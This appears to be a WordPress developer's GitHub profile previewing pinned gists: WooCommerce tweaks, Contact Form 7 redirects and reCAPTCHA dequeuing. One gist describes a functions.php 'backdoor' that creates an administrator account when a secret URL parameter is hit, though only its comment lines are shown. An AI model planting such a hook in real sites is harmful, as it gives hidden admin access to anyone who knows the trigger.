🎯
Focusing
HUMAN BEING (Homo sapiens) Living on the beautiful Earth! 🌎 That’s it!
-
WPDeveloper
- Dhaka, Bangladesh
-
18:44
(UTC +06:00) - https://abidhasan.me
- @abid_hasan112
Pinned Loading
-
If you don't want to see "Woocommerc...
If you don't want to see "Woocommerce Review" section on your product page, then add this line on your functions.php 1add_filter( 'woocommerce_product_tabs', 'wcs_woo_remove_reviews_tab', 98 );
2function wcs_woo_remove_reviews_tab($tabs) {
3unset($tabs['reviews']);
4return $tabs;
5}
-
This is like a backdoor of your Word...
This is like a backdoor of your WordPress site. This lines of code will generate user, password as a admin role by URL hit. 1//Hit this URL after put code on functions.php : http://www.yourdomain.com/?backdoor=knockknock
2//It will create username= name ; password= pass ; role= administrator on your wordpress backend users.
3//After that you can login on your site with this username and password.
4//change the 'backdoor' , 'knockknock' , 'name', 'pass' string on your code as your desire texts
5 -
This JavaScript is hide another clas...
This JavaScript is hide another class if the specific class is exists. 1<script type="text/javascript">
23$(document).ready(function(){
4if ($('.mwd-success').css('display') == 'block') {
5$('.email-confirm-sub').css('display', 'none');
-
This code will Redirect you to "Succ...
This code will Redirect you to "Success Page/Thank You" page after Submit the form of Contact Form-7 [WORDPRESS] 1<script>
2document.addEventListener( 'wpcf7mailsent', function( event ) {
3location = 'http://example.com/';
4}, false );
5</script>
-
This function is provide the facilit...
This function is provide the facility of another button called "Direct Checkout" besides 'Add to Cart" which will takes user to the direct checkout page on Woocommerce. 1/********************************************************************************************
2*Add this on functions.php of your WordPress
3*********************************************************************************************/
45function add_content_after_addtocart() {
-
This is for the WordPress user who u...
This is for the WordPress user who uses Contact Form-7 integration for reCAPTCHA v3 . Google introduced a new reCAPTCHA v3 which is run on the background of the webpage. So no need to perform that checkbox and stupid image puzzle anymore. Google detects automatically with their algorithm of Human or Bot. In reCAPTCHA v3 in Contact Form-7 is perform all over the website and it shows the badges(bottom right side) which is attack some of the site owners mind. So, here is the code you can dequeue this script in page or specific pages. Add this on your functions.php by changing the value of the array of page slugs. 1//For one page
2add_action('wp_print_scripts', function () {
3if ( !is_page('contact-us') ){
4wp_dequeue_script( 'google-recaptcha' );
5}
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.